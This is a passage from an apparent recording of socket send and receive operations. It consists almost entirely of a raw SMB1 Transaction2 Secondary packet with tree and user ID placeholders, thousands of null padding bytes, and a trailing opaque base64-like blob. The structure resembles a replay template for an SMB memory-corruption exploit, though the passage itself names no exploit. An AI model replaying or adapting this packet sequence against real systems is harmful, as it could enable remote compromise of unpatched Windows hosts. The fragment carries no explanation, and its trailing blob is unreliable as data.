\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x0
0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('recv', 1, 0.0)\", \"('send', 1, b'\\\\x00\\\\x00\\\\x105\\\\xffSMB3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\xfe__USERID__PLACEHOLDER__@\\\\x00\\\\t\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x105\\\\x00\\\\xd0\\\\x03\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\
\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00
\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x
00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\
\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\
\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x0
0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\
x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x83\\\\xf3h6agLCqPqVyXi2VSQ8O6Yb9ijBX54jY6KM+sz33NmS6TK8XlOk920s0E0aajOV++wrR92ds1FOLBO+evLPj4sIvAjLvaLdgk8+BlNZs8PMa9bQ340J83nx1p4f+GLpbxUyzsAzkE9gB3hBYp3+0hNXMjbyjXwB40Q4KiDbip/d7N0CmRT1gLy+n2Rp/EYO5Fkapa4Y4kqDhPvLuOfGUvjN4BNdBk23r0/F3ZmfIe7zH9ecfDqJkkApLkf3Ls4CMvJ48cbGhUqHrML0az1LCeE3BqKLCL3gP10fExyMnFGtbq3rBd+5eKxSXYVD4fBKtFYI47YYbjYxxF76O9LNZEpPP9SiCEo9qRYLDcYzGu81JRU7/GHDKWSnvgjForSvyRO/e9ElIg1ISeyywaPJA1t1skDj8abBEOqAOXimo54/eZzGmLJ92xLwDIl8rHuZsUywgeZH/tSPXYQi0Pswy57TYZ/0/mXVIQjwi8EdJohFb3TKAzdHRMYopPusHBP7qyy18